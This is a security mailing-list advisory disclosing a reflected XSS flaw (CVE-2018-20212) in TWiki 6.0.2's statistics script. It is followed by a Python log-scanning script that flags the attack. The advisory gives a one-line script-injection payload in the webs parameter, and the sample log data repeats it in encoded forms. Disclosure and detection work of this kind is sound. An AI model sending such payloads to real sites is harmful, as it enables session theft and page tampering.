[FD] /bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212)
- To: "fulldisclosure" <fulldisclosure@xxxxxxxxxxxx>
- From: "zzt0907" <16362505@xxxxxx>
- Date: Thu, 3 Jan 2019 08:19:21 +0800
# bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter (CVE-2018-20212)
## Vulnerability Type
Cross Site Scripting (XSS)
## Vendor of Product
TWiki
## Affected Product Version
TWiki 6.0.2
## Affected Component
twiki/bin/statistics
## Attack Type
Remote
## Attack Vectors
/twiki/bin/statistics?webs=<script>alert(1)</script>
## Credit
This vulnerability was discovered by Jiawang Zhang Coordination Center of China
(CNCERT/CC)
## Product Download
http://twiki.org/cgi-bin/view/Codev/DownloadTWiki
## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20212
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
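
A defender-side check for the request shape listed under Attack Vectors, as an added example that is not part of the original advisory or of TWiki's code: it scans web-server access-log lines for `bin/statistics` requests whose `webs` value is anything other than a plain list of web names. The sample log lines, the allow-list pattern for web names and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Assumption: a legitimate `webs` value is a comma-separated list of web names
# (letters, digits, underscore; "." or "/" between a web and its subweb).
NAME = r"[A-Za-z0-9_]+(?:[./][A-Za-z0-9_]+)*"
WEBS_OK = re.compile(rf"{NAME}(?:,\s*{NAME})*")
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jan/2019:08:20:01 +0800] "GET /twiki/bin/statistics?webs=Main,Sandbox HTTP/1.1" 200 812',
    '198.51.100.7 - - [03/Jan/2019:08:21:44 +0800] "GET /twiki/bin/statistics?webs=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 901',
    '198.51.100.7 - - [03/Jan/2019:08:22:10 +0800] "GET /twiki/bin/statistics?webs=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 901',
    '192.0.2.10 - - [03/Jan/2019:08:23:00 +0800] "GET /twiki/bin/view/Main/WebHome?webs=%3Cb%3E HTTP/1.1" 200 4000',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so the report shows the final markup."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_statistics_requests(lines):
    """Return (client, decoded webs value) for each request that fails the allow-list."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # Match the script with or without trailing path info.
        if not re.search(r"/bin/statistics(?:/|$)", url.path):
            continue
        # CGI-style query strings may separate parameters with ";" as well as "&".
        params = parse_qs(url.query.replace(";", "&"), keep_blank_values=True)
        for raw in params.get("webs", []):
            value = fully_decode(raw)
            if value and not WEBS_OK.fullmatch(value):
                hits.append((client, value))
    return hits

if __name__ == "__main__":
    for client, value in flag_statistics_requests(SAMPLE_LOG):
        print(f"{client}\twebs={value!r}")
```

The same allow-list can be applied as a request filter in front of the script; output encoding of the parameter inside the application remains the actual fix for reflected XSS.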